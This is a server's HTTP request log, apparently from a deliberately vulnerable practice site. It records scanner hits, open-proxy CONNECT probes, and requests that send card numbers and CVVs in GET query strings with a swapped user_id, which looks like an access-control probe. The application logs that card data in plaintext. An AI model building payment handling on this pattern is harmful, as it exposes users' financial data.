Path: /
URL: /
Method: GET
[2026-02-19 00:58:39] === HTTP Request ===
===================
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 184.105.139.96:36551
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-02-19 00:54:38] === HTTP Request ===
[2026-02-19 00:53:30] Main page accessed - IP: 184.105.139.68:5710
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 184.105.139.68:5710
Path: /
URL: /
Method: GET
[2026-02-19 00:53:30] === HTTP Request ===
[2026-02-18 23:31:15] Main page accessed - IP: 198.235.24.171:51604
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.171:51604
Path: /
URL: /
Method: GET
[2026-02-18 23:31:15] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:34476
Path: /jars
URL: /jars
Method: GET
[2026-02-18 23:12:55] === HTTP Request ===
[2026-02-18 23:06:53] Main page accessed - IP: 198.235.24.17:61642
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: auth.vulnberries.ru
RemoteAddr: 198.235.24.17:61642
Path: /
URL: /
Method: GET
[2026-02-18 23:06:53] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:37064
Path: /dispatch.asp
URL: /dispatch.asp
Method: GET
[2026-02-18 22:20:30] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 193.149.189.126:7227
RemoteAddr: 176.65.148.2:8378
Path:
URL: //193.149.189.126:7227
Method: CONNECT
[2026-02-18 21:48:11] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 176.65.148.2:8376
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-02-18 21:48:09] === HTTP Request ===
[2026-02-18 21:06:48] Main page accessed - IP: 172.30.0.12:36972
===================
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 23.27.145.85
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36972
Path: /
URL: /
Method: GET
[2026-02-18 21:06:48] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36
X-Forwarded-Proto: https
Accept-Language: en-US,en;q=0.9,de-CH;q=0.8,de;q=0.7,ca;q=0.6
X-Forwarded-For: 83.150.56.179
Via: 2.0 Caddy
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50760
Path: /js/twint_ch.js
URL: /js/twint_ch.js
Method: GET
[2026-02-18 20:42:38] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36
Via: 2.0 Caddy
Accept-Language: en-US,en;q=0.9,de-CH;q=0.8,de;q=0.7,ca;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 83.150.56.179
Accept-Encoding: gzip, deflate
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50760
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-18 20:42:37] === HTTP Request ===
===================
X-Forwarded-For: 83.150.56.179
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en-US,en;q=0.9,de-CH;q=0.8,de;q=0.7,ca;q=0.6
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50760
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-02-18 20:42:37] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9,de-CH;q=0.8,de;q=0.7,ca;q=0.6
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 83.150.56.179
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50760
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-18 20:42:37] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 83.150.56.179
Accept-Language: en-US,en;q=0.9,de-CH;q=0.8,de;q=0.7,ca;q=0.6
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50760
Path: /css/support_parent.css
URL: /css/support_parent.css
Method: GET
[2026-02-18 20:42:37] === HTTP Request ===
===================
Via: 2.0 Caddy
Accept-Language: en-US,en;q=0.9,de-CH;q=0.8,de;q=0.7,ca;q=0.6
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36
X-Forwarded-For: 83.150.56.179
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50760
Path: /js/lkk_ch.js
URL: /js/lkk_ch.js
Method: GET
[2026-02-18 20:42:37] === HTTP Request ===
[2026-02-18 20:42:37] Main page accessed - IP: 172.30.0.12:50760
===================
X-Forwarded-For: 83.150.56.179
Via: 2.0 Caddy
Accept-Language: en-US,en;q=0.9,de-CH;q=0.8,de;q=0.7,ca;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50760
Path: /
URL: /
Method: GET
[2026-02-18 20:42:37] === HTTP Request ===
===================
From: oai-searchbot(at)openai.com
X-Forwarded-For: 74.7.175.136
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45908
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-18 19:34:26] === HTTP Request ===
[2026-02-18 19:01:05] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:60922
===================
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-Dest: document
Pragma: no-cache
Cache-Control: no-cache
X-Forwarded-Proto: https
Via: 2.0 Caddy
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60922
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-02-18 19:01:05] === HTTP Request ===
[2026-02-18 19:01:05] Update Financial Info - user_id: 17, card_number: 23234, card_holder: 234, expiry_date: 1234, cvv: 1234
===================
Sec-Fetch-Mode: cors
Cookie: auth=sess_1771436025634926192; user_id=1
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-Site: same-origin
Priority: u=0
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60922
Query: user_id=17&card_number=23234&card_holder=234&expiry_date=1234&cvv=1234
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=23234&card_holder=234&expiry_date=1234&cvv=1234
Method: GET
[2026-02-18 19:01:05] === HTTP Request ===
[2026-02-18 19:00:08] Update Financial Info - user_id: 19, card_number: 23234, card_holder: 234, expiry_date: 1234, cvv: 1234
===================
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Priority: u=0
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Accept: */*
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60922
Query: user_id=17&card_number=23234&card_holder=234&expiry_date=1234&cvv=1234
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=23234&card_holder=234&expiry_date=1234&cvv=1234
Method: GET
[2026-02-18 19:00:08] === HTTP Request ===
[2026-02-18 18:57:34] Update Financial Info - user_id: , card_number: 23234, card_holder: 234, expiry_date: 1234, cvv: 1234
===================
Accept-Encoding: gzip, deflate, br
Accept: */*
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Priority: u=0
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40528
Query: user_id=17&card_number=23234&card_holder=234&expiry_date=1234&cvv=1234
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=23234&card_holder=234&expiry_date=1234&cvv=1234
Method: GET
[2026-02-18 18:57:34] === HTTP Request ===